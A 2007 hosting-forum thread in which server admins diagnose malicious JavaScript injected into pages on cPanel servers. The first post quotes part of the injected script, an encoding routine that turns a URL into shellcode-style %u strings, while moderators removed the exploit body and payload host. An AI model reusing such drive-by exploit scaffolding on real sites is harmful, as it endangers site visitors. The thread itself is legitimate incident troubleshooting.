Page 1 of 10 1234 ... LastLast
Results 1 to 15 of 149
  1. #1
    Join Date
    May 2004
    Location
    chicago
    Posts
    173

    Exclamation Linux servers having CPANEL - js virus hitting

    Hi All,


    Earlier this week, our users started reporting that they were getting active-x prompts for Microsoft Data Access Component installation. In addition some of them were getting hit byt the RTSP bug (quicktime) and some were getting the JS/Explot-BO.gen alerts via McAfee. Upon troubleshooting, we see that irrespective of the page type (simple html, php, etc) at times a script tag similar to the one below is inserted right after the <body> tag.

    <script language='JavaScript' type='text/javascript' src='shfuy.js'></script>

    The javascript file name changes and the problem only occurs at times. There is no set pattern to reproduce the problem although I have noticed that if I connect to the server via a new IP address from my DSL connection, I get the javascript in the source.

    I ran some sniffer traces on the server and my laptop. This showed that the javascript was being sent by the server. I was able to capture the javascript (contents of the javascript below).

    Solutions tried:
    I have checked for the filenames but they do not exist on the server.

    1) Have run chkrootkit and rootkit hunter - All clean
    2) Have run clamav - All clean


    Would appreciate if anybody could provide some inputs on what we might be dealing with and how to resolve the problem.

    Javascript code:
    var arg="akmukvfd";
    var MU = "http://" + window.location.hostname + "/" + arg;
    var MH = '';
    for (i=0; i < MU.length; i++)
    {
    var b = MU.charCodeAt (i);
    MH = MH + b.toString (16);
    }
    MH = MH.toUpperCase();
    if (Math.round(MU.length/2) != (MU.length/2))
    {
    MH += '00';
    }

    var MR = '';
    for (i=0; i < MH.length; i += 4)
    {
    MR = MR + '%u' + MH.substring(i+2, i+4) + MH.substring(i, i+2);
    }

    var MU2 = "\"" + MU + "\"";
    var MR2 = "\"" + MR + "\"";

    var SB =
    <<removed encoded exploit>>

    document.write (SB);

    Thanks,
    Regards
    Rushik Shah
    Last edited by bear; 11-25-2007 at 09:59 PM. Reason: Pointless to help spread this
    CEO - Alakmalak Technologies www.Alakmalak.com
    Web Application Development : Website Development Web Designing
    Support Toll Free +1-800-789-9620 Skype : rushik Operating Since 2003 || Team size of 35+ Web development center at INDIA

  2. #2
    Join Date
    Apr 2001
    Location
    Paradise
    Posts
    11,642
    Anybody have the FTP information of all the accounts having this problem? it may be possible that a compromised computer were infecting those sites without even knew it.
    Shared Web Hosting - Reseller Hosting - Semi-Dedicated Servers - SolusVM/XEN VPS
    LiteSpeed Powered - R1Soft Continuous Data Protection - 24/7 Chat/Email/Helpdesk Support
    Cpanel/WHM - Softaculous - R1soft Backup - Litespeed - Cloudlinux -Site Builder- SSH support - Account Migration
    DowntownHost LLC - In Business since 2001- West/Center/East USA - Netherlands - Singapore

  3. #3
    Join Date
    Oct 2003
    Location
    Chattanooga
    Posts
    8,926
    It's more than likely it was just a deface of the specific account. Doubtful that it's an end-user's system being exploited and then FTPing up the data, far too much effort

  4. #4
    Join Date
    May 2004
    Location
    chicago
    Posts
    173
    Hi Jedito / David

    Thanks for your quick reply. Actually I already did this check

    I changed ftp passwords, but still it got effected after 3-4 days again.

    The matter of fact is almost all websites on the server are affected. Mostly the index . html, php files

    Any clue

    Thanks!
    Regards
    Rushik Shah
    CEO - Alakmalak Technologies www.Alakmalak.com
    Web Application Development : Website Development Web Designing
    Support Toll Free +1-800-789-9620 Skype : rushik Operating Since 2003 || Team size of 35+ Web development center at INDIA

  5. #5
    Join Date
    Apr 2001
    Location
    Paradise
    Posts
    11,642
    Quote Originally Posted by David View Post
    It's more than likely it was just a deface of the specific account. Doubtful that it's an end-user's system being exploited and then FTPing up the data, far too much effort

    There's an trojan which does this automatically, the trojan infect the computer and pickup all the FTP book of any FTP program installed in the computer, it does send it to the "hacker" which lately use it to upload the infected data, this happened to one of my resellers awhile ago.

    to the OP, check on the FTP logs of the affected account which files were uploaded and check if the IP uploading those files mismatch in all them.
    Shared Web Hosting - Reseller Hosting - Semi-Dedicated Servers - SolusVM/XEN VPS
    LiteSpeed Powered - R1Soft Continuous Data Protection - 24/7 Chat/Email/Helpdesk Support
    Cpanel/WHM - Softaculous - R1soft Backup - Litespeed - Cloudlinux -Site Builder- SSH support - Account Migration
    DowntownHost LLC - In Business since 2001- West/Center/East USA - Netherlands - Singapore

  6. #6
    Join Date
    Jul 2005
    Location
    Belgium
    Posts
    506
    Hi,

    Which platforms does this trojan infects? Do you know its name?

    Thanks,
    sash
    kept alive by vertaalbureau

  7. #7
    Join Date
    Nov 2007
    Posts
    51
    Is there a way to stop this from happening on a cpanel server?

  8. #8
    Looks like a buffer overflow JS exploit. NoScript stops it, but I would do this:

    find / -name *.js | xargs grep unescape
    ☊ Talk to family, friends, teammates and colleagues with a myMumble voice server. 19 locations around the world!
    SysadminBoard - Share and obtain knowledge directly from veteran systems administrators.

  9. #9
    Join Date
    Feb 2006
    Posts
    1,108
    The code is here: <<snipped>>
    Last edited by anon-e-mouse; 11-25-2007 at 09:04 PM.
    semi-retired

  10. #10
    Also, check xferlog and see who uploaded it.
    ☊ Talk to family, friends, teammates and colleagues with a myMumble voice server. 19 locations around the world!
    SysadminBoard - Share and obtain knowledge directly from veteran systems administrators.

  11. #11
    Join Date
    May 2003
    Location
    Kirkland, WA
    Posts
    4,448
    To clarify, there is absolutely no evidence provided that this is at all isolated to cPanel even if it is in fact an issue.
    Nick Nelson
    Sr. Director & GM, VAS
    Demand Media
    425.298.2282 nn@demandmedia.com

  12. #12
    Don't paste code like that on a public forum.
    ☊ Talk to family, friends, teammates and colleagues with a myMumble voice server. 19 locations around the world!
    SysadminBoard - Share and obtain knowledge directly from veteran systems administrators.

  13. #13
    Join Date
    Feb 2006
    Posts
    1,108
    Quote Originally Posted by zacharooni View Post
    Don't paste code like that on a public forum.
    It's already in the OP, just URI encoded.
    semi-retired

  14. #14
    Join Date
    Oct 2002
    Location
    Middle Dearth
    Posts
    21,074
    Quote Originally Posted by Procyon View Post
    It's already in the OP, just URI encoded.
    Not any more. Let's try not to feed the "kiddies".
    Having problems, or maybe questions about WHT? Head over to the help desk!

  15. #15
    Join Date
    Sep 2003
    Location
    Europe
    Posts
    318
    Hello Rushik,

    I can second your findings. The exploit appears all the time on different pages (the page indicated by KIS keeps changing, usually HTML) and it doesn't appear twice for the same IP and this seems to me to be related to IE only. Have you discovered anything new?

    Looks like a buffer overflow JS exploit. NoScript stops it, but I would do this:

    find / -name *.js | xargs grep unescape
    There is usually NO unescape(), no eval(), no iframe anywhere on the affected accounts. The .js file (this also changes) doesn't even exist anywhere on the server. It's like Trojan-Downloader.JS.Small.fs gets generated on the fly (in our case it tries to download a Exploit.HTML.IESlice.n from <<removed>>

    Any clue anyone?

    Thanks and regards!
    Last edited by bear; 11-28-2007 at 07:27 AM.

Page 1 of 10 1234 ... LastLast

Related Posts from theWHIR.com

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •